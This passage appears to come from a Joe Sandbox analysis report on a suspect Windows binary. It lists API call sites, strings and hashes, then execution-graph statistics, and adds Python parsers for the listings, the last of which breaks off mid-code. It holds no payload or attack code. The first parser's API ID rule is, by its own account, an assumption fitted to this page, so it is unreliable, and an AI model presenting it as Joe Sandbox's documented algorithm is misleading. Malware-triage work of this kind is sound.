                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: SystemTime
                                                                                • String ID:
                                                                                • API String ID: 2656138-0
                                                                                • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                • API String ID: 4190037839-2401316094
                                                                                • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                • LocalFree.KERNEL32(0044F4F0,00000000,00401AB4), ref: 00401A1B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0044F4F0,00000000,00401AB4), ref: 00401A3A
                                                                                • LocalFree.KERNEL32(004504F0,?,00000000,00008000,0044F4F0,00000000,00401AB4), ref: 00401A79
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: E
                                                                                • API String ID: 3782394904-409520393
                                                                                • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                  • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
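The "APIs" bullets and the "API ID" field in the Similarity section are the parts of these listings an analyst reuses: the call sites give the function's behaviour, and the API ID is a compact token signature that can be compared against the same function in other samples. The following Python is an added example, not Joe Sandbox code. It parses the call-site bullets (including the indented "Part of subcall function" lines) into records, lists the string arguments a function pushes (for the block above that resolves GetUserDefaultUILanguage this yields the kernel32.dll / export-name pair, i.e. the dynamic API resolution the report flags), and rebuilds the API ID. The token-dropping rule in api_tokens is inferred from the API IDs printed on this page and is an assumption about an algorithm Joe Sandbox does not document; the numeric "API String ID" hash and the ordering of "String ID" are not reproduced. The sample listing is copied from the GetSystemDefaultLCID block above.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report into
structured call-site records and rebuild the "API ID" token string.

Added example, not Joe Sandbox code.  The API ID rule is inferred from the
listings on this page and is an assumption (see api_tokens)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Matches the three call-site shapes that occur in the listings:
#   • CreateFileA.KERNEL32(00000000,80000000,...), ref: 00403B1E
#   • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(...), ref: 0040521A
#   • ExitProcess.KERNEL32 ref: 00403DE5          (no argument list)
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)
_CAMEL_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+|[a-z]+")
_HEX_ARG_RE = re.compile(r"-?[0-9A-Fa-f]{8}")


@dataclass(frozen=True)
class ApiCall:
    api: str                   # e.g. "GetLocaleInfoA"
    module: str                # e.g. "KERNEL32"
    args: Tuple[str, ...]      # stack values exactly as printed
    ref: Optional[str]         # address of the call instruction
    subcall_of: Optional[str]  # callee address when reported via a subcall line


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract call-site records.  Headings ("APIs", "Strings") and the
    Memory Dump Source / Similarity bullets do not match and are skipped."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def api_tokens(api_name: str) -> List[str]:
    """Split an API name on CamelCase boundaries and drop the tokens the
    report's API IDs evidently ignore.  ASSUMED rule, fitted to the IDs on
    this page rather than documented: tokens shorter than four characters
    (Get, Set, Rtl, Reg, Sys, Key, Box, Std, Len, Ex, Of, To, A ...) and
    all-uppercase acronyms (LCID) are discarded."""
    return [t for t in _CAMEL_RE.findall(api_name)
            if len(t) >= 4 and not t.isupper()]


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild the API ID: tokens are counted over all call sites (subcall
    lines included), grouped by count with the most frequent group first,
    groups joined by '$', tokens sorted alphabetically inside a group."""
    counts = Counter(tok for c in calls for tok in api_tokens(c.api))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n]))
                    for n in sorted(groups, reverse=True))


def referenced_strings(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither 8-digit hex values nor the '?' placeholder:
    the string literals the function pushes, e.g. the DLL and export names
    handed to GetModuleHandleA/GetProcAddress for dynamic API resolution."""
    found = {a for c in calls for a in c.args
             if a and a != "?" and not _HEX_ARG_RE.fullmatch(a)}
    return sorted(found)


# Constructed input: the GetSystemDefaultLCID listing copied from this report.
SAMPLE_LISTING = """\
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
  • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
Strings
Memory Dump Source
• Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LISTING)
    for c in calls:
        print(c.api, c.module, c.ref, "subcall of", c.subcall_of)
    print("API ID:", api_id(calls))  # InfoLocale$DefaultSystem, as printed on the page
```

Feeding a whole report into parse_api_lines and grouping the records by the block they came from lets you diff API IDs between samples of the same family; because only the token rule is assumed, verify the rebuilt IDs against the ones the report prints before relying on them elsewhere.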
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000$9@
                                                                                • API String ID: 1220098344-1503883590
                                                                                • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: E
                                                                                • API String ID: 730355536-409520393
                                                                                • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CommandHandleLineModule
                                                                                • String ID: U1hd.@$h'C
                                                                                • API String ID: 2123368496-2741041117
                                                                                • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: )q@
                                                                                • API String ID: 3660427363-2284170586
                                                                                • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                APIs
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                Execution Graph

                                                                                Execution Coverage:16%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:4.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:69
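The execution_graph dump that follows is a flat, whitespace-separated stream: a node is a decimal id followed by the function's hex address and, optionally, the Win32 APIs that function calls (or a collapsed marker such as "18 API calls"), and an edge is written src->dst. Read by hand it is close to useless, but it is easy to turn back into a call graph. The parser below is an added example, not part of the Joe Sandbox report or of its tooling; the grammar is inferred from the dump itself, which is an assumption, and the SAMPLE string is constructed from fragments of the dump on this page, abridged (the chain between nodes 49836 and 49838 is collapsed into one edge) so that it runs offline. It resolves a function by address and collects every API reachable from it over the call edges, which is what you want when triaging a node such as 0x492208 (FindWindowA, SendMessageA, CreateMutexA and friends in the full dump).

```python
"""Parse a Joe Sandbox execution_graph dump and list the Win32 APIs reachable
from a given function node.

Assumed format (inferred from the dump on the page, not from Joe Sandbox
documentation): a whitespace-separated stream in which
  <id> <hex-address> [label words...]   defines a node; the label is the API
                                         names it calls, or a collapsed
                                         "N API calls" marker
  <src>-><dst>                           is a call edge between node ids
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d+$")
HEX_ADDR = re.compile(r"^[0-9a-f]{4,8}$")      # e.g. 40cf00, 492208
EDGE = re.compile(r"^(\d+)->(\d+)$")
COLLAPSED = re.compile(r"^\d+ API calls$")      # e.g. "18 API calls"

# Constructed sample: fragments of the page's own dump, abridged so the
# example runs offline (the chain between 49836 and 49838 is collapsed to a
# single edge).  Not the complete graph.
SAMPLE = """
49694 40cf00 49695 40cf12 49694->49695 49696 40cf0d 49694->49696 49698 406f50 CloseHandle 49696->49698 49698->49695
49699 492208 49700 49223c 49699->49700 49701 49223e 49700->49701 49702 492252 49700->49702
49845 446fac 18 API calls 49701->49845 49705 492261 49702->49705 49707 49228e 49702->49707
49704 492247 Sleep 49719 492289 49704->49719 49835 447008 49705->49835 49709 492270
49713 492278 FindWindowA 49709->49713 49839 447288 49713->49839 49845->49704
49836 447010 49835->49836 49838 44702f 49836->49838 49838->49709
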